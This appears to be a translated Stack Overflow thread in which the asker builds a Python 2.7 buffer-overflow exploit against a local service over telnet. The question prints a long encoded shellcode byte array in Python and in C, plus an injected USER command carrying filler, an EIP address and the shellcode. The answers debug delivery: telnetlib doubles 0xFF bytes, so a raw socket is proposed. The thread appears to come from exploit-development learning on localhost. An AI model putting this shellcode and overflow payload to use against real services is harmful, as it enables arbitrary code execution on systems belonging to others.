0

Python 版本是 2.7.3。

代码是这样的……完整的代码在这里

https://gist.github.com/3977494

shellcode = bytearray(
        "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
        "\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x6a"
        "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x7a\x32\x42\x42\x42\x32"
        "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x6b"
        "\x58\x53\x74\x77\x70\x67\x70\x73\x30\x6e\x6b\x61\x55\x57\x4c\x4e"
        "\x6b\x51\x6c\x45\x55\x32\x58\x66\x61\x58\x6f\x6e\x6b\x50\x4f\x56"
        "\x78\x4e\x6b\x41\x4f\x65\x70\x33\x31\x4a\x4b\x63\x79\x6e\x6b\x65"
        "\x64\x4c\x4b\x57\x71\x7a\x4e\x37\x41\x4b\x70\x4e\x79\x6c\x6c\x4f"
        "\x74\x4f\x30\x70\x74\x37\x77\x6f\x31\x79\x5a\x46\x6d\x67\x71\x4b"
        "\x72\x5a\x4b\x38\x74\x65\x6b\x41\x44\x47\x54\x43\x34\x52\x55\x68"
        "\x65\x4e\x6b\x33\x6f\x34\x64\x37\x71\x4a\x4b\x72\x46\x6c\x4b\x64"
        "\x4c\x50\x4b\x6c\x4b\x51\x4f\x35\x4c\x63\x31\x68\x6b\x4c\x4b\x35"
        "\x4c\x4c\x4b\x45\x51\x7a\x4b\x6c\x49\x73\x6c\x56\x44\x65\x54\x5a"
        "\x63\x50\x31\x69\x50\x61\x74\x6c\x4b\x67\x30\x64\x70\x6b\x35\x4f"
        "\x30\x72\x58\x34\x4c\x4c\x4b\x71\x50\x44\x4c\x4c\x4b\x72\x50\x55"
        "\x4c\x4c\x6d\x4e\x6b\x73\x58\x53\x38\x68\x6b\x36\x69\x4e\x6b\x6b"
        "\x30\x78\x30\x55\x50\x75\x50\x55\x50\x6c\x4b\x52\x48\x57\x4c\x41"
        "\x4f\x47\x41\x4a\x56\x71\x70\x76\x36\x6d\x59\x69\x68\x4d\x53\x6b"
        "\x70\x33\x4b\x52\x70\x30\x68\x68\x70\x6d\x5a\x74\x44\x33\x6f\x70"
        "\x68\x6d\x48\x6b\x4e\x6f\x7a\x64\x4e\x41\x47\x4b\x4f\x4b\x57\x42"
        "\x43\x70\x6d\x63\x54\x36\x4e\x71\x75\x61\x68\x30\x65\x65\x70\x64"
        "\x6f\x31\x73\x71\x30\x62\x4e\x42\x45\x52\x54\x61\x30\x53\x45\x71"
        "\x63\x75\x35\x30\x72\x37\x50\x72\x48\x50\x61\x62\x43\x52\x4b\x41"
        "\x30\x75\x38\x43\x51\x45\x33\x70\x6b\x45\x70\x54\x6f\x72\x61\x42"
        "\x64\x61\x54\x71\x30\x46\x46\x55\x76\x41\x30\x30\x6e\x61\x75\x71"
        "\x64\x41\x30\x32\x4c\x52\x4f\x41\x73\x73\x51\x52\x4c\x43\x57\x54"
        "\x32\x52\x4f\x62\x55\x44\x30\x67\x50\x53\x71\x33\x54\x62\x4d\x61"
        "\x79\x42\x4e\x42\x49\x51\x63\x62\x54\x32\x52\x70\x61\x74\x34\x42"
        "\x4f\x61\x62\x31\x63\x31\x30\x61\x78\x33\x51\x31\x73\x50\x6b\x65"
        "\x70\x46\x4f\x63\x71\x61\x54\x61\x54\x63\x30\x6a"
        )

tn = telnetlib.Telnet('127.0.0.1', 11000) 
user_string = "USER " + fill + eip_address + fill2 + shellcode + '\n' 
tn.write(user_string) 
pass_string = "PASS 123\n" 
tn.write(pass_string)

我的朋友在 c 中使用相同的字符串,一切正常。当我检查ollyDbg时,我发现命令不同,似乎python改变了编码类型。我不知道...有什么帮助吗?这让我疯狂。

unsigned char shellcode[] = 
        "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
        "\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x6a"
        "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x7a\x32\x42\x42\x42\x32"
        "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x6b"
        "\x58\x53\x74\x77\x70\x67\x70\x73\x30\x6e\x6b\x61\x55\x57\x4c\x4e"
        "\x6b\x51\x6c\x45\x55\x32\x58\x66\x61\x58\x6f\x6e\x6b\x50\x4f\x56"
        "\x78\x4e\x6b\x41\x4f\x65\x70\x33\x31\x4a\x4b\x63\x79\x6e\x6b\x65"
        "\x64\x4c\x4b\x57\x71\x7a\x4e\x37\x41\x4b\x70\x4e\x79\x6c\x6c\x4f"
        "\x74\x4f\x30\x70\x74\x37\x77\x6f\x31\x79\x5a\x46\x6d\x67\x71\x4b"
        "\x72\x5a\x4b\x38\x74\x65\x6b\x41\x44\x47\x54\x43\x34\x52\x55\x68"
        "\x65\x4e\x6b\x33\x6f\x34\x64\x37\x71\x4a\x4b\x72\x46\x6c\x4b\x64"
        "\x4c\x50\x4b\x6c\x4b\x51\x4f\x35\x4c\x63\x31\x68\x6b\x4c\x4b\x35"
        "\x4c\x4c\x4b\x45\x51\x7a\x4b\x6c\x49\x73\x6c\x56\x44\x65\x54\x5a"
        "\x63\x50\x31\x69\x50\x61\x74\x6c\x4b\x67\x30\x64\x70\x6b\x35\x4f"
        "\x30\x72\x58\x34\x4c\x4c\x4b\x71\x50\x44\x4c\x4c\x4b\x72\x50\x55"
        "\x4c\x4c\x6d\x4e\x6b\x73\x58\x53\x38\x68\x6b\x36\x69\x4e\x6b\x6b"
        "\x30\x78\x30\x55\x50\x75\x50\x55\x50\x6c\x4b\x52\x48\x57\x4c\x41"
        "\x4f\x47\x41\x4a\x56\x71\x70\x76\x36\x6d\x59\x69\x68\x4d\x53\x6b"
        "\x70\x33\x4b\x52\x70\x30\x68\x68\x70\x6d\x5a\x74\x44\x33\x6f\x70"
        "\x68\x6d\x48\x6b\x4e\x6f\x7a\x64\x4e\x41\x47\x4b\x4f\x4b\x57\x42"
        "\x43\x70\x6d\x63\x54\x36\x4e\x71\x75\x61\x68\x30\x65\x65\x70\x64"
        "\x6f\x31\x73\x71\x30\x62\x4e\x42\x45\x52\x54\x61\x30\x53\x45\x71"
        "\x63\x75\x35\x30\x72\x37\x50\x72\x48\x50\x61\x62\x43\x52\x4b\x41"
        "\x30\x75\x38\x43\x51\x45\x33\x70\x6b\x45\x70\x54\x6f\x72\x61\x42"
        "\x64\x61\x54\x71\x30\x46\x46\x55\x76\x41\x30\x30\x6e\x61\x75\x71"
        "\x64\x41\x30\x32\x4c\x52\x4f\x41\x73\x73\x51\x52\x4c\x43\x57\x54"
        "\x32\x52\x4f\x62\x55\x44\x30\x67\x50\x53\x71\x33\x54\x62\x4d\x61"
        "\x79\x42\x4e\x42\x49\x51\x63\x62\x54\x32\x52\x70\x61\x74\x34\x42"
        "\x4f\x61\x62\x31\x63\x31\x30\x61\x78\x33\x51\x31\x73\x50\x6b\x65"
        "\x70\x46\x4f\x63\x71\x61\x54\x61\x54\x63\x30\x6a";

在此处输入图像描述

哦,我差不多明白了。00AEFD70这么多FF。为什么?

我用 C++ 编写了相同的功能代码。一切正常。这是比较。

在此处输入图像描述 换句话说,这是怎么回事?

在此处输入图像描述

4

2 回答 2

2

telnet lib 文档表明(强调我的):

将字符串写入套接字,将任何 IAC 字符加倍。如果连接被阻止,这可能会阻止。如果连接关闭,可能会引发 socket.error。

IAC 字符恰好是 ASCII 255,即'\xff'.

如果你比较你的两个转储:IAC charFF在 python 版本中加倍,但在 C 版本中没有,它使用原始套接字,你也可以在 Python 中使用socket模块来做到这一点。

于 2012-10-30T00:28:46.967 回答
1

您的使用bytearray可能是更改 shellcode,尝试在没有bytearray函数的情况下定义 shellcode。例如:

shellcode = (
        "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
        "\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x6a"
        "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x7a\x32\x42\x42\x42\x32"
        ...
        ...
)
于 2012-10-29T16:41:22.047 回答